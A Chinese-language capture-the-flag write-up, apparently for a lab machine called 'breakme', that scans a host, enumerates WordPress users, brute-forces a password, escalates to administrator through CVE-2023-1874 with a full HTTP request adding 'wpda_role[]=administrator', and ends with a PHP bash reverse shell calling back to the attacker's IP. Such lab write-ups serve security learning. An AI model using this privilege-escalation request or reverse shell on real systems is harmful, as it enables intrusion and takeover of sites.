breakme

(Updated: )
,

基本信息

目标IP: 10.10.227.21
本机IP:10.17.5.121

端口扫描

rustscan

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
root@HACK:~# rustscan -a 10.10.227.21
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog         :
: https://github.com/RustScan/RustScan :
 --------------------------------------
Scanning ports faster than you can say 'SYN ACK'

[~] The config file is expected to be at "/root/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'. 
Open 10.10.227.21:22
Open 10.10.227.21:80
[~] Starting Script(s)
[~] Starting Nmap 7.80 ( https://nmap.org ) at 2024-11-16 00:33 HKT
Initiating Ping Scan at 00:33
Scanning 10.10.227.21 [4 ports]
Completed Ping Scan at 00:33, 0.28s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 00:33
Completed Parallel DNS resolution of 1 host. at 00:33, 5.50s elapsed
DNS resolution of 1 IPs took 5.50s. Mode: Async [#: 3, OK: 0, NX: 1, DR: 0, SF: 0, TR: 3, CN: 0]
Initiating SYN Stealth Scan at 00:33
Scanning 10.10.227.21 [2 ports]
Discovered open port 22/tcp on 10.10.227.21
Discovered open port 80/tcp on 10.10.227.21
Completed SYN Stealth Scan at 00:33, 0.28s elapsed (2 total ports)
Nmap scan report for 10.10.227.21
Host is up, received timestamp-reply ttl 60 (0.27s latency).
Scanned at 2024-11-16 00:33:47 HKT for 6s

PORT   STATE SERVICE REASON
22/tcp open  ssh     syn-ack ttl 60
80/tcp open  http    syn-ack ttl 60

Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 6.16 seconds
           Raw packets sent: 6 (240B) | Rcvd: 3 (128B)

dirsearch

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
┌──(kali㉿kali)-[~/Documents/thm]
└─$ dirsearch -u http://10.10.227.21/
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
  from pkg_resources import DistributionNotFound, VersionConflict

  _|. _ _  _  _  _ _|_    v0.4.3
 (_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460

Output File: /home/kali/Documents/thm/reports/http_10.10.227.21/__24-11-15_11-20-59.txt

Target: http://10.10.227.21/

[11:20:59] Starting: 
[11:21:14] 403 -  277B  - /.ht_wsr.txt                                      
[11:21:14] 403 -  277B  - /.htaccess.bak1                                   
[11:21:14] 403 -  277B  - /.htaccess.sample                                 
[11:21:14] 403 -  277B  - /.htaccess.orig
[11:21:14] 403 -  277B  - /.htaccess.save
[11:21:14] 403 -  277B  - /.htaccess_orig                                   
[11:21:14] 403 -  277B  - /.htaccess_extra
[11:21:14] 403 -  277B  - /.htaccess_sc
[11:21:14] 403 -  277B  - /.htaccessOLD
[11:21:14] 403 -  277B  - /.htaccessBAK
[11:21:14] 403 -  277B  - /.htaccessOLD2                                    
[11:21:14] 403 -  277B  - /.html                                            
[11:21:14] 403 -  277B  - /.htm                                             
[11:21:14] 403 -  277B  - /.htpasswd_test                                   
[11:21:14] 403 -  277B  - /.htpasswds
[11:21:14] 403 -  277B  - /.httr-oauth
[11:21:18] 403 -  277B  - /.php                                             
[11:22:49] 301 -  313B  - /manual  ->  http://10.10.227.21/manual/          
[11:22:49] 200 -  208B  - /manual/index.html                                
[11:23:14] 403 -  277B  - /server-status/                                   
[11:23:14] 403 -  277B  - /server-status
[11:23:46] 200 -    2KB - /wordpress/wp-login.php                            
[11:23:47] 200 -   14KB - /wordpress/

发现有wordpress?

wpscan --url http://10.10.227.21/wordpress

用户名枚举
wpscan --url http://10.10.227.21/wordpress --enumerate u

1
2
3
4
5
6
7
8
9
10
11
12
13
14

[+] admin
 | Found By: Author Posts - Author Pattern (Passive Detection)
 | Confirmed By:
 |  Rss Generator (Passive Detection)
 |  Wp Json Api (Aggressive Detection)
 |   - http://10.10.227.21/wordpress/index.php/wp-json/wp/v2/users/?per_page=100&page=1
 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 |  Login Error Messages (Aggressive Detection)

[+] bob
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

用户名爆破

1
2
┌──(kali㉿kali)-[~/Documents/thm/breakmenu]
└─$ wpscan --url http://10.10.227.21/wordpress -U username.txt -P /usr/share/wordlists/rockyou.txt 
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
Trying bob / tigger Time: 00:00:03 <> (24 / 14344392)  0.00%  ETrying bob / password1 Time: 00:00:03 <> (25 / 14344392)  0.00%[SUCCESS] - bob / soccer                                       
Trying bob / soccer Time: 00:00:03 <> (29 / 14344422)  0.00%  ETrying bob / anthony Time: 00:00:03 <> (29 / 14344422)  0.00%  Trying bob / anthony Time: 00:00:03 <> (30 / 14344422)  0.00%  ETA: ??:??:??

[!] Valid Combinations Found:
 | Username: bob, Password: soccer

[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register

[+] Finished: Fri Nov 15 11:50:38 2024
[+] Requests Done: 201
[+] Cached Requests: 7
[+] Data Sent: 57.482 KB
[+] Data Received: 478.876 KB
[+] Memory used: 298.184 MB
[+] Elapsed time: 00:00:27

php

现在查看漏洞情况

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37

[+] WordPress theme in use: twentytwentyfour
 | Location: http://10.10.227.21/wordpress/wp-content/themes/twentytwentyfour/
 | Last Updated: 2024-07-16T00:00:00.000Z
 | Readme: http://10.10.227.21/wordpress/wp-content/themes/twentytwentyfour/readme.txt
 | [!] The version is out of date, the latest version is 1.2
 | Style URL: http://10.10.227.21/wordpress/wp-content/themes/twentytwentyfour/style.css
 | Style Name: Twenty Twenty-Four
 | Style URI: https://wordpress.org/themes/twentytwentyfour/
 | Description: Twenty Twenty-Four is designed to be flexible, versatile and applicable to any website. Its collecti...
 | Author: the WordPress team
 | Author URI: https://wordpress.org
 |
 | Found By: Urls In Homepage (Passive Detection)
 |
 | Version: 1.0 (80% confidence)
 | Found By: Style (Passive Detection)
 |  - http://10.10.227.21/wordpress/wp-content/themes/twentytwentyfour/style.css, Match: 'Version: 1.0'

[+] Enumerating All Plugins (via Passive Methods)
[+] Checking Plugin Versions (via Passive and Aggressive Methods)

[i] Plugin(s) Identified:

[+] wp-data-access
 | Location: http://10.10.227.21/wordpress/wp-content/plugins/wp-data-access/
 | Last Updated: 2024-10-17T00:01:00.000Z
 | [!] The version is out of date, the latest version is 5.5.16
 |
 | Found By: Urls In Homepage (Passive Detection)
 |
 | Version: 5.3.5 (80% confidence)
 | Found By: Readme - Stable Tag (Aggressive Detection)
 |  - http://10.10.227.21/wordpress/wp-content/plugins/wp-data-access/readme.txt

[+] Enumerating Config Backups (via Passive and Aggressive Methods)
 Checking Config Backups - Time: 00:00:10 <============================================

版本信息
WordPress version 6.4.3

Bob到admin

CVE-2023-1874漏洞

增加字段 wpda_role[]=administrator

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
POST /wordpress/wp-admin/profile.php HTTP/1.1

Host: 10.10.227.21

User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8

Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2

Accept-Encoding: gzip, deflate, br

Referer: http://10.10.227.21/wordpress/wp-admin/profile.php

Content-Type: application/x-www-form-urlencoded

Content-Length: 328

Origin: http://10.10.227.21

Connection: keep-alive

Cookie: wordpress_acb53ed9bd9ffb9d3641ba5b6474a8cd=bob%7C1731862320%7CjmBQkub8cT9VHTtMl4atHbZISLdhsQ6s7X5Z7OXe9DW%7C6142fcc0d753857ba3d07e771cc893e1e4c6cd51c9a49f165f94273087512582; wordpress_test_cookie=WP%20Cookie%20check; wordpress_logged_in_acb53ed9bd9ffb9d3641ba5b6474a8cd=bob%7C1731862320%7CjmBQkub8cT9VHTtMl4atHbZISLdhsQ6s7X5Z7OXe9DW%7C5319955523faa3dbf4b646dcee47744c231d7956c4bf85f5b56e2a14c01be0a5; wp-settings-time-2=1731690049; wp-settings-2=mfold%3Do

Upgrade-Insecure-Requests: 1

Priority: u=0, i



_wpnonce=5c284f6a11&_wp_http_referer=%2Fwordpress%2Fwp-admin%2Fprofile.php&from=profile&checkuser_id=2&color-nonce=685716284a&admin_color=fresh&admin_bar_front=1&first_name=bob&last_name=bob&nickname=bob&display_name=bob+bob&email=bob%40localhost.com&url=&description=&pass1=&pass2=&action=update&user_id=2&submit=Update+Profile&wpda_role[]=administrator

admin权限

找到主题

修改某个页面 然后进行反弹webshell?
文件上传?

1
2
3
4
5
6
┌──(kali㉿kali)-[~/Documents/thm/breakmenu]
└─$ cat shell.php
<?php
eval(\"/bin/bash -c 'bash -i >& /dev/tcp/10.17.5.121/4443 0>&1'\");
?>